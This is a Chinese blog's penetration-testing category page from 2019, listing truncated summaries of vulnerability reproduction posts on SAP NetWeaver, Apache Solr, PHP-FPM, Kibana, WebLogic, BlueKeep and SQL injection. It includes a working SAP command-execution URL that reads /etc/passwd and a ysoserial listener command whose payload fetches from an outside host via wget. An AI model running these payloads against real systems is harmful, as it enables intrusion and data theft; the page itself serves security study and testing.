随笔分类 -  渗透测试

上一页 1 2 3 4 下一页
Sap Netweaver命令执行
摘要:http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat /etc/passwd 阅读全文
posted @ 2019-12-09 15:29 mrhonest 阅读(1306) 评论(0) 推荐(0)
内网优质文章汇总
摘要:PowerShell渗透 Empire https://www.cnblogs.com/micr067/p/11729984.html PowerShell攻击:nishang https://www.cnblogs.com/micr067/p/11746225.html 利用计划任务进行权限维持的 阅读全文
posted @ 2019-11-21 09:16 mrhonest 阅读(308) 评论(0) 推荐(0)
一文让PHP反序列化从入门到进阶
摘要:https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247487912&idx=3&sn=4fb934044620c43f27138491642e974f&chksm=fa395172cd4ed8646aa954ea02fe0bdafae6a 阅读全文
posted @ 2019-11-18 14:59 mrhonest 阅读(148) 评论(0) 推荐(0)
MD5加密后的SQL 注入
摘要:这样一个sql,其实可以注入。 思路比较明确,当md5后的hex转换成字符串后,如果包含'or'这样的字符串,那整个sql变成 提供一个字符串: md5后,276f722736c95d99e921722cf9ed621c 再转成字符串:'or'6 from:https://www.jianshu.c 阅读全文
posted @ 2019-11-07 10:58 mrhonest 阅读(652) 评论(0) 推荐(0)
Mysql任意读取客户端文件复现
摘要:本机执行 目标机器上连接本机数据库 本机即可读取到目标机器上的passwd文件 修改读取文件 其它利用方式 后话 至于如果在目标机器上连接本机mysql 比如phpmyadmin 阅读全文
posted @ 2019-11-01 15:05 mrhonest 阅读(771) 评论(0) 推荐(0)
Apache Solr远程命令执行复现
摘要:环境 /vulhub/solr/CVE 2019 0193/ 创建一个集合 正戏 开启params.resource.loader.enabled 命令执行 反弹shell 阅读全文
posted @ 2019-10-31 14:20 mrhonest 阅读(2160) 评论(0) 推荐(0)
利用mysql数据库日志文件获得webshell
摘要:查看配置 开启日志功能 设置日志存储路径 ; 执行sql语句,写入日志文件 成功写入 阅读全文
posted @ 2019-10-31 10:15 mrhonest 阅读(1026) 评论(0) 推荐(0)
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现-含EXP
摘要:搭建容器 安装golang 利用程序 https://github.com/neex/phuip fpizdam 安装git Cobra包安装 编译 EXP EXP下载 创建文件 参考:https://github.com/vulhub/vulhub/blob/master/php/CVE 2019 阅读全文
posted @ 2019-10-24 11:31 mrhonest 阅读(1043) 评论(0) 推荐(0)
Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609
摘要:登陆kibana poc 阅读全文
posted @ 2019-10-21 09:56 mrhonest 阅读(2048) 评论(0) 推荐(0)
漏洞验证系列--MongoDB未授权访问
摘要:本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。 本漏洞是由于MongoDB未设置访问权限,用户可以直接连上该数据库 Linux下执行 mongo 目标ip:端口号 show dbs;#列出有哪些数据库, 阅读全文
posted @ 2019-10-08 09:24 mrhonest 阅读(866) 评论(0) 推荐(0)
Docker API暴露下的危机
摘要:0x01:简介 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。 当您在系统上安装 docker 时,它将暴露位于端口2375 阅读全文
posted @ 2019-09-30 13:49 mrhonest 阅读(384) 评论(0) 推荐(0)
泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041
摘要:靶机 影响版本 泛微e cology 阅读全文
posted @ 2019-09-23 21:49 mrhonest 阅读(1124) 评论(0) 推荐(0)
Harbor任意管理员注册漏洞复现CVE-2019-16097
摘要:注册时抓包 添加poc 管理员权限 POC 阅读全文
posted @ 2019-09-21 10:24 mrhonest 阅读(2526) 评论(0) 推荐(0)
CVE-2017-3248简单复现
摘要:我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205 阅读全文
posted @ 2019-09-17 15:14 mrhonest 阅读(1510) 评论(0) 推荐(1)
一个文件下载
摘要:起因 一次授权的渗透测试 两个文件下载页面 这个很简单了,修改D:\xxx\xxx\xxx\upload\xxx.docx 即可用dama1.jsp文件名下载下来 正戏 有个上传的地方 是这样的 正常抓取的数据包我没有保存 总之就是把上传成功的文件名改为../../../../../这种 然后在下载 阅读全文
posted @ 2019-09-12 17:02 mrhonest 阅读(247) 评论(0) 推荐(0)
CVE-2019-0708简单复现
摘要:各文件对应位置 windows7 配置参数 建立session 获得交互式shell windows2008 R2 64x 蓝屏 阅读全文
posted @ 2019-09-09 10:57 mrhonest 阅读(368) 评论(0) 推荐(0)
ACCESS、MSSQL、MYSQL、ORACLE 手工注入
摘要:http://www.zerokeeper.com/web security/manual injection of access mssql mysql and oracle.html 0x01 基本常识 简单判定有无漏洞: 粗略型:提交单引号’ 逻辑型(数字型注入):and 1=1/and 1= 阅读全文
posted @ 2019-08-30 13:26 mrhonest 阅读(703) 评论(0) 推荐(0)
常见未授权访问漏洞总结
该文被密码保护。
posted @ 2019-08-28 10:26 mrhonest
CVE-2018-3246 weblogic xxe
摘要:使用P牛2018 2894的容器 导入测试用例 上传时抓取数据包 修改payload FTP服务会收到连接信息 阅读全文
posted @ 2019-08-27 16:58 mrhonest 阅读(968) 评论(0) 推荐(0)
Imagetragick 命令执行漏洞(CVE-2016–3714)
摘要:参考:https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh cn.md 阅读全文
posted @ 2019-08-23 14:39 mrhonest 阅读(409) 评论(0) 推荐(0)

上一页 1 2 3 4 下一页